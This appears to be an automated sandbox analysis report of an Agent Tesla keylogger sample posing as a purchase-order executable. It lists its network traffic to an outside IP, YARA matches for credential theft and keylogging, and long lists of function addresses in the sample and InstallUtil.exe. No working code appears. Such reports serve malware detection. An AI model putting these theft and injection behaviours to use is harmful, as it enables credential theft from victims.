                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49742 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, SKTzxzsJw.cs.Net Code: RePIUNFdBeM

                      System Summary

                      barindex
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: initial sampleStatic PE information: Filename: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B46560 NtResumeThread,0_2_05B46560
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B44C20 NtProtectVirtualMemory,0_2_05B44C20
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B46558 NtResumeThread,0_2_05B46558
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B44C19 NtProtectVirtualMemory,0_2_05B44C19
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06364C20 NtProtectVirtualMemory,2_2_06364C20
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06366560 NtResumeThread,2_2_06366560
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06364C19 NtProtectVirtualMemory,2_2_06364C19
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06366558 NtResumeThread,2_2_06366558
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_06114C20 NtProtectVirtualMemory,5_2_06114C20
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_06116560 NtResumeThread,5_2_06116560
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_06114C19 NtProtectVirtualMemory,5_2_06114C19
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_06116558 NtResumeThread,5_2_06116558
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05D50D400_2_05D50D40
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05D518780_2_05D51878
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05D06E5B0_2_05D06E5B
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_00D46A880_2_00D46A88
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_00D4D4680_2_00D4D468
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_00D44F280_2_00D44F28
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_00D46A770_2_00D46A77
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_00D493180_2_00D49318
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_00D493280_2_00D49328
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_00D44F190_2_00D44F19
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059CC5A80_2_059CC5A8
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059C79780_2_059C7978
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059CD2000_2_059CD200
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059CC5980_2_059CC598
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059CD1F00_2_059CD1F0
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059CEB580_2_059CEB58
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059CEB490_2_059CEB49
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059CFA980_2_059CFA98
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059CFAA80_2_059CFAA8
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059E142C0_2_059E142C
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059ED0980_2_059ED098
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059E00400_2_059E0040
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059E45B00_2_059E45B0
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059E45A10_2_059E45A1
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059EB7B00_2_059EB7B0
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059EB7A00_2_059EB7A0
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059E5F000_2_059E5F00
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059E5EF10_2_059E5EF1
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059ED08A0_2_059ED08A
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059E00060_2_059E0006
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B41E500_2_05B41E50
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B482D80_2_05B482D8
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B495F00_2_05B495F0
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B43D280_2_05B43D28
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B43D180_2_05B43D18
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B41D750_2_05B41D75
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B497560_2_05B49756
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B4EED80_2_05B4EED8
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B4EEC80_2_05B4EEC8
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B482C80_2_05B482C8
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B492650_2_05B49265
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B5C6F20_2_05B5C6F2
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B588480_2_05B58848
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B5DD080_2_05B5DD08
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B500060_2_05B50006
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B500400_2_05B50040
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B593880_2_05B59388
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B5CA270_2_05B5CA27
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B54A780_2_05B54A78
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05BB001E0_2_05BB001E
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05BB00400_2_05BB0040
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05E4DCE80_2_05E4DCE8
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05E4D1380_2_05E4D138
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05E300400_2_05E30040
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05E300070_2_05E30007
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_01564A601_2_01564A60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_01569C621_2_01569C62
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0156CF281_2_0156CF28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_01563E481_2_01563E48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_015641901_2_01564190
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_068256B01_2_068256B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_068200401_2_06820040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_06823F281_2_06823F28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0682BCC81_2_0682BCC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_06822AE81_2_06822AE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0682DBF81_2_0682DBF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_06828B5A1_2_06828B5A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0682321B1_2_0682321B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_06824FD01_2_06824FD0
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_012B1A1A2_2_012B1A1A
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_012B6A882_2_012B6A88
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_012BD4682_2_012BD468
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_012B4F282_2_012B4F28
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_012B93282_2_012B9328
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_012B93182_2_012B9318
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_012B6A772_2_012B6A77
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_012B1CFD2_2_012B1CFD
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_012B4F192_2_012B4F19
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06192B202_2_06192B20
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_061EC5A82_2_061EC5A8
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_061ED2002_2_061ED200
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_061E79782_2_061E7978
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_061EC5102_2_061EC510
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_061EC5982_2_061EC598
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_061EEB582_2_061EEB58
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_061EEB482_2_061EEB48
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_061ED1F02_2_061ED1F0
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0620142C2_2_0620142C
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_062000402_2_06200040
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0620D0982_2_0620D098
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06205EF12_2_06205EF1
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06205F002_2_06205F00
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0620B7A02_2_0620B7A0
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0620B7B02_2_0620B7B0
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_062045A12_2_062045A1
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_062045B02_2_062045B0
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_062000072_2_06200007
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0620D08E2_2_0620D08E
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06361E502_2_06361E50
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_063682D82_2_063682D8
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0636EEF82_2_0636EEF8
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0636EF082_2_0636EF08
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_063697562_2_06369756
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06363D282_2_06363D28
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06363D182_2_06363D18
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06361D752_2_06361D75
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_063695F02_2_063695F0
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_063692652_2_06369265
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_063682C82_2_063682C8
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0637C6F22_2_0637C6F2
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_063788482_2_06378848
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_063793882_2_06379388
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_063700062_2_06370006
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_063700402_2_06370040
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0637DD082_2_0637DD08
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0637CA272_2_0637CA27
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06374A782_2_06374A78
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_063D001E2_2_063D001E
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_063D00402_2_063D0040
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_065814402_2_06581440
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_065809082_2_06580908
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_065852612_2_06585261
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_065856302_2_06585630
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0658142F2_2_0658142F
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_065808F82_2_065808F8
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0666DCE82_2_0666DCE8
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_066500402_2_06650040
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_066500062_2_06650006
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0666D1382_2_0666D138
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06192B012_2_06192B01
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00A993F83_2_00A993F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00A94A603_2_00A94A60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00A99C703_2_00A99C70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00A93E483_2_00A93E48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00A9CF283_2_00A9CF28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00A941903_2_00A94190
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_04F6BCC03_2_04F6BCC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_04F6DC003_2_04F6DC00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_04F68B603_2_04F68B60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_04F656A83_2_04F656A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_04F636303_2_04F63630
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_04F600403_2_04F60040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_04F62EE83_2_04F62EE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_04F64FC83_2_04F64FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_04F63F203_2_04F63F20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_059082483_2_05908248
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0590AD803_2_0590AD80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_059095343_2_05909534
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00A99C683_2_00A99C68
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_01171A1A5_2_01171A1A
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_01176A885_2_01176A88
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_01174F285_2_01174F28
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_011793185_2_01179318
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_011793285_2_01179328
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_01176A775_2_01176A77
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_0117257B5_2_0117257B
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_0117D4685_2_0117D468
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_01171CFD5_2_01171CFD
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_01174F195_2_01174F19
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05F9C5A85_2_05F9C5A8
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05F979785_2_05F97978
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05F9D2005_2_05F9D200
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05F9C5985_2_05F9C598
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05F9D1F05_2_05F9D1F0
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05F9EB585_2_05F9EB58
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05F9EB495_2_05F9EB49
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05FB142C5_2_05FB142C
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05FBD0985_2_05FBD098
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05FB00405_2_05FB0040
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05FB45B05_2_05FB45B0
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05FB45A15_2_05FB45A1
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05FBB7B05_2_05FBB7B0
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05FBB7A05_2_05FBB7A0
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05FB5F005_2_05FB5F00
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05FB5EF15_2_05FB5EF1
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05FBD08A5_2_05FBD08A
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05FB00065_2_05FB0006
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_06111E505_2_06111E50
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_061182D85_2_061182D8
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_0611EEF85_2_0611EEF8
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_0611EF085_2_0611EF08
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_061197565_2_06119756
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_06113D185_2_06113D18
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_06113D285_2_06113D28
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_06111D755_2_06111D75
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_061195F05_2_061195F0
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_061192655_2_06119265
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_061182C85_2_061182C8
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_0612C6F35_2_0612C6F3
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_061288485_2_06128848
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_061293885_2_06129388
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_061200065_2_06120006
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_061200405_2_06120040
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_0612DD085_2_0612DD08
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_0612CA275_2_0612CA27
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_06124A785_2_06124A78
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_0618001D5_2_0618001D
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_061800405_2_06180040
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_063314405_2_06331440
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_063309085_2_06330908
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_063356305_2_06335630
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_0633142F5_2_0633142F
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_063352615_2_06335261
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_063308F85_2_063308F8
